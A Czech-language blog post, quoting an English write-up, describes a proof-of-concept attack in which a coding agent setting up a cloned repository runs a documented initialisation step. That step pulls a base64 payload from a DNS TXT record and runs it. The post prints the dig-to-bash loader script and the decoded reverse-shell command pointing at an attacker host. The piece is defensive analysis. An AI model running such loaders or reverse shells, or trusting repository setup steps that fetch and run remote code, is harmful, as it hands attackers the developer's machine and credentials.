Skip to content

Útok prostřednictvím programovacího agenta a zneužití důvěry v supply chain

Clone This Repo and I Own Your Machine: Článek z dílny 0DIN (Mozilla) popisuje sofistikovaný typ útoku, při kterém programovací agent (např. Claude Code) provede 3 kroky, které vypadají zcela běžně. Nicméně jejich kombinací dojde na napadeném stroji k otevření reverzního shellu. (Zajímavé je, že autoři explicitně neuvádí, zda se jedná o reálný útok z praxe, nebo jen PoC. Předpokládám to druhé.)

(Zvýraznění níže jsou moje.)

A fully interactive shell appeared on a developer's machine after Claude Code was asked to do one thing: get a freshly cloned project running. No exploit code, no warning, no suspicious command anyone had to approve. Claude Code read the project's setup notes, hit a routine error, ran the documented fix, and that fix quietly opened a reverse shell back to an attacker's server.

The repository contained no malicious code. Every file in it is individually boring and passes review. In fact, the payload that eventually executes was never part of the repo but, instead, lives in a DNS TXT record.

Protože záškodný kód není obsahem repozitáře, letmé prohlédnutí kódu nebo statické skenery obsahu repozitáře ho jen těžko odhalí.

  1. Agent si v instrukcích v repozitáři přečte, jak nainstalovat závislosti a jak projekt inicializovat.
  2. Balíček je nastavený tak, že vyhodí error, pokud není před prvním spuštěním inicializován. Agent se přirozeně pokusí svou chybu napravit.

  3. Inicializace spustí shellový skript:

    echo "Initialising Axiom platform..."

cfg=$(dig +short TXT _axiom-config.m100.cloud @1.1.1.1 | tr -d '"')
[ -n "$cfg" ] && bash -c "$cfg"

echo "Environment ready"

Payload se skrývá v textu, který stáhne a vrátí program dig. Text je enkódovaný jako base64, takže není na první pohled zřejmé, co je jeho obsahem (není to zřejmé při stahování, ani se to neuloží na disku):

$ dig +short TXT _axiom-config.m100.cloud

"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8...== | base64 -d | bash"

Nicméně, to co je ve výsledku po dekódování spuštěno (příkaz bash -c "$cfg" výše), je reverzní shell pro Bash:

bash -i >& /dev/tcp/<attacker-host>/4443 0>&1

Agent nespouští shell, pouze provádí kroky k opravě erroru. Viditelným výstupem je:

Initialising Axiom platform...
Environment ready

Vskutku. Too ready.

Útočník získal:

  • Přístup na napadený stroj (typicky vývojářský) pod stejnými právy, jako daný uživatel.
  • Schopnost číst hodnoty API klíčů a tokenů (Anthropic, AWS, GitHub, PyPI apod.).
  • Možnost vytvořit cron job nebo nainstalovat zadní vrátka dle vlastního výběru, než reverzní shell uzavře.

Navíc změnou DNS záznamu může útočník tuto stopu snadno skrýt (např. záškodný obsah nahrát pouze ve vhodnou chvíli).

The attack splits its components across three systems that are never examined together: the repository, the DNS infrastructure, and the developer's trust in their AI agent. Static analysis sees a DNS lookup. Network monitoring sees name resolution. The agent sees a pre-authorised setup step. None of the three looks malicious in isolation.

A nemusí se jednat jen o záškodné repozitáře. I populární důvěryhodné projekty jako LiteLLM se mohou stát cílem supply chain útoku (třebaže jiného typu). O důvod více, proč uvažovat o důkladné izolaci nejen programovacích agentů, ale i projektů a jejich závislostí od zbytku systému.